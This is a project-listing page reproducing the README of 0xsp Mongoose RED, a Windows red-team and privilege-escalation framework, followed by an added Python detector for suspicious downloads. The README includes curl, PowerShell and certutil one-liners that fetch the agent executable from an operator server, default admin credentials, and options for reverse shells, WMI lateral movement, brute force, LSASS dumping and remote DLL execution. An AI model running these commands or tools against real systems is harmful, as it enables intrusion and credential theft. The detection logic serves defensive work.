
lawrenceamer / 0xsp Mongoose

Licence: gpl-3.0
A framework for cybersecurity simulation and red-team operations: Windows auditing for newer vulnerabilities, misconfigurations and privilege-escalation attacks, replicating the tactics and techniques of an advanced adversary in a network.

Programming Languages

pascal

Projects that are alternatives of or similar to 0xsp Mongoose

A Red Teamer Diaries
RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements.
Stars: ✭ 382 (-8.83%)
Mutual labels:  security-tools, redteam, privilege-escalation
Diamorphine
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64)
Stars: ✭ 725 (+73.03%)
Mutual labels:  security-tools, security-audit, redteam
Wsltools
Web Scan Lazy Tools - Python Package
Stars: ✭ 288 (-31.26%)
Mutual labels:  security-tools, security-audit
Prowler
Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. It contains more than 200 controls covering CIS, ISO27001, GDPR, HIPAA, SOC2, ENS and other security frameworks.
Stars: ✭ 4,561 (+988.54%)
Mutual labels:  security-tools, security-audit
Otseca
Open source security auditing tool to search and dump system configuration. It allows you to generate reports in HTML or RAW-HTML formats.
Stars: ✭ 416 (-0.72%)
Mutual labels:  security-tools, security-audit
Hellraiser
Vulnerability scanner using Nmap for scanning and correlating found CPEs with CVEs.
Stars: ✭ 413 (-1.43%)
Mutual labels:  security-tools, security-audit
Dgfraud
A Deep Graph-based Toolbox for Fraud Detection
Stars: ✭ 281 (-32.94%)
Mutual labels:  toolkit, security-tools
Ssh Mitm
ssh mitm server for security audits supporting public key authentication, session hijacking and file manipulation
Stars: ✭ 335 (-20.05%)
Mutual labels:  security-tools, security-audit
gtfo
Search for Unix binaries that can be exploited to bypass system security restrictions.
Stars: ✭ 88 (-79%)
Mutual labels:  privilege-escalation, redteam
Taipan
Web application vulnerability scanner
Stars: ✭ 359 (-14.32%)
Mutual labels:  security-tools, security-audit
Impost3r
👻Impost3r -- A linux password thief
Stars: ✭ 355 (-15.27%)
Mutual labels:  security-tools, redteam
W5
Security Orchestration, Automation and Response (SOAR) Platform. A security orchestration and automated-response platform: security automation without writing code; using SOAR lets teams work more efficiently.
Stars: ✭ 367 (-12.41%)
Mutual labels:  security-tools, security-audit
Salt Scanner
Linux vulnerability scanner based on Salt Open and Vulners audit API, with Slack notifications and JIRA integration
Stars: ✭ 261 (-37.71%)
Mutual labels:  security-tools, security-audit
Electriceye
Continuously monitor your AWS services for configurations that can lead to degradation of confidentiality, integrity or availability. All results will be sent to Security Hub for further aggregation and analysis.
Stars: ✭ 255 (-39.14%)
Mutual labels:  security-tools, security-audit
Traitor
⬆️ ☠️ Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, polkit, docker socket
Stars: ✭ 3,473 (+728.88%)
Mutual labels:  security-tools, privilege-escalation
MicrosoftWontFixList
A list of vulnerabilities or design flaws that Microsoft does not intend to fix. Since the number is growing, I decided to make a list. This list covers only vulnerabilities that came up in July 2021 (and SpoolSample ;-))
Stars: ✭ 854 (+103.82%)
Mutual labels:  security-tools, redteam
Raptor
Web-based Source Code Vulnerability Scanner
Stars: ✭ 314 (-25.06%)
Mutual labels:  security-tools, security-audit
Sherlock
This script is designed to help expedite a web application assessment by automating some of the assessment steps (e.g., running nmap, sublist3r, metasploit, etc.)
Stars: ✭ 36 (-91.41%)
Mutual labels:  security-audit, redteam
moonwalk
Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps. 👻🐚
Stars: ✭ 544 (+29.83%)
Mutual labels:  privilege-escalation, redteam
Super
Secure, Unified, Powerful and Extensible Rust Android Analyzer
Stars: ✭ 340 (-18.85%)
Mutual labels:  security-tools, security-audit


0xsp Mongoose RED for Windows

Current Release 2.2.0

The 0xsp Mongoose RED version is provided to assist with cyber-security simulation: with it you can audit a targeted Windows operating system for system vulnerabilities, misconfigurations and privilege-escalation attacks, and replicate the tactics and techniques of an advanced adversary in a network.

With Node.js support for the web application API, installation and customization become much easier and quicker; the Windows sensor agent communicates with the application API to transfer results and to receive commands over a bidirectional channel.

The agent identifies and detects Windows exploits by using the Windows Update API together with exploit-database definition modules. The new release also detects the following vulnerabilities:

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472

Features

  • Windows privilege-escalation scanning techniques.
  • Web application built with Node.js.
  • SQLite database support.
  • Lateral movement techniques.
  • Bidirectional communication channel.
  • Online plugin packaging.
  • Enhanced exploit-detector scripting engine.
  • Windows account brute-force module (local / domain).
  • Weaponization of the run-as-user Windows API function.
  • Local network scanning and share enumeration.
  • LSASS memory dumping technique (plugin).

Installation

git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

Default access credentials:

  • username : admin
  • password : 0xsp

Change the default password before the web application is reachable by anything other than the operator's own host.

Quick deployment of the agent

#example 1 
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2 
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3 
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe
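The three one-liners above are standard living-off-the-land download patterns (certutil -urlcache, PowerShell WebClient.DownloadFile, curl.exe -o), which is also exactly what a defender hunts for when looking for agent staging. The following detection logic is an added example written for this page, not code from 0xsp Mongoose; the Sysmon-style process-creation records, the "|" field separator and the server address 10.0.0.5 are constructed for illustration.

```python
"""Flag the LOLBin download one-liners used to stage the agent.

Added example, not part of 0xsp Mongoose. Input is a constructed, simplified
Sysmon Event ID 1 (process creation) format: key=value fields joined by "|".
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample events (not real telemetry). The first three mirror the
# deployment one-liners; the last two are benign uses of the same binaries.
SAMPLE_LOGS = """\
Image=C:\\Windows\\System32\\curl.exe|CommandLine=curl.exe -o agent.exe http://10.0.0.5:4000/release/x64.exe|ParentImage=C:\\Windows\\System32\\cmd.exe
Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell.exe -command (new-object net.webclient).downloadfile('http://10.0.0.5:4000/release/x64.exe','c:\\tmp\\agent.exe');|ParentImage=C:\\Windows\\System32\\cmd.exe
Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil.exe -urlcache -split -f "http://10.0.0.5:4000/release/x64.exe" agent.exe|ParentImage=C:\\Windows\\System32\\cmd.exe
Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil.exe -verify cert.cer|ParentImage=C:\\Windows\\explorer.exe
Image=C:\\Windows\\System32\\curl.exe|CommandLine=curl.exe --version|ParentImage=C:\\Windows\\System32\\cmd.exe
"""

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
CURL_OUTPUT_RE = re.compile(r"(^|\s)(-o|--output)(\s|$)")


@dataclass
class Hit:
    rule: str
    severity: str
    image: str
    parent: str
    command_line: str


def parse_event(line: str) -> dict:
    """Split one 'key=value|key=value' record into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased for matching."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(event: dict) -> Optional[Hit]:
    """Apply the three download rules to a parsed event; None if no rule fires."""
    cmd = event.get("CommandLine", "")
    lowered = cmd.lower()
    name = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    has_url = URL_RE.search(cmd) is not None

    # certutil has no legitimate reason to fetch a URL into the cache on a
    # workstation; -urlcache plus a URL is a strong signal on its own.
    if name == "certutil.exe" and "-urlcache" in lowered and has_url:
        return Hit("certutil_urlcache_download", "high", name, parent, cmd)
    # WebClient.DownloadFile / DownloadString from a one-line -command.
    if name == "powershell.exe" and has_url and (
        "downloadfile" in lowered or "downloadstring" in lowered
    ):
        return Hit("powershell_webclient_download", "high", name, parent, cmd)
    # curl.exe ships with current Windows builds and is used legitimately, so a
    # download written to disk is only medium severity and needs triage.
    if name == "curl.exe" and has_url and CURL_OUTPUT_RE.search(lowered):
        return Hit("curl_download_to_disk", "medium", name, parent, cmd)
    return None


def scan(log_text: str) -> list:
    """Run every non-empty line through check_event and collect the hits."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        hit = check_event(parse_event(line))
        if hit is not None:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOGS):
        print(f"[{h.severity}] {h.rule}: {h.image} (parent {h.parent}) :: {h.command_line}")
```

The curl rule is deliberately rated lower because curl.exe is a built-in on current Windows and appears in benign automation; the certutil and PowerShell WebClient forms have little legitimate use on a workstation and are worth alerting on regardless of destination. Note also that all three deployment examples fetch the agent over plain HTTP on port 4000, so the staging itself is visible to anyone on the network path.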

Usage

-s --retrieve Windows services and installed drivers.
-u --retrieve information about users, groups and roles.
-c --search connected drives for sensitive config files by extension.
-n --retrieve network information: network interfaces and connection details.
-w --enumerate writeable directories, check access permissions and modified permissions.
-i --enumerate Windows system information, sessions, and the Always Elevated check.
-l --search any file for a specific string, e.g. agent.exe -l c:\ password *.config
-o --specify the host address of the Node.js application (-srvhost can be used as well).
-p --enumerate installed software, running processes and tasks.
-e --kernel inspection tool; searches the tool's databases for Windows kernel vulnerabilities.
-x --password used to authorize your connection with the Node.js application.
-d --download files directly onto the target machine.
-t --upload files from the target machine to the Node.js application.
-m --run all known scan types together.

[!] RED TEAMING TACTICS SECTION

-r --spawn a reverse shell as a specific account.
-lr --lateral movement technique using WMI (e.g. -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip).
-nds --network discovery and share enumeration.
-cmd --transfer commands via the HTTP shell.
-interactive --start interactive mode (e.g. loading plugins, etc.).
-username --identity authentication for specific attack modules.
-password --identity authentication for specific attack modules.
-host --remote host to conduct an attack against.
-srvhost --set the rhost of the Node.js application.
-bf --local users / domain users brute-force module.
-import --import and execute a DLL file locally.
-remote --import and execute a DLL file from a remote host.

Documentation

https://0xsp.com/security%20dev/0xsp-mongoose-red

Detailed research site

https://0xsp.com

Security Conferences

Contribution

The project is open source and was built with the Lazarus IDE; you are welcome to suggest ideas or report bugs.

Tool tutorials

Subscribe to the following channel to be notified when new tutorials and tricks for 0xsp are published: https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg
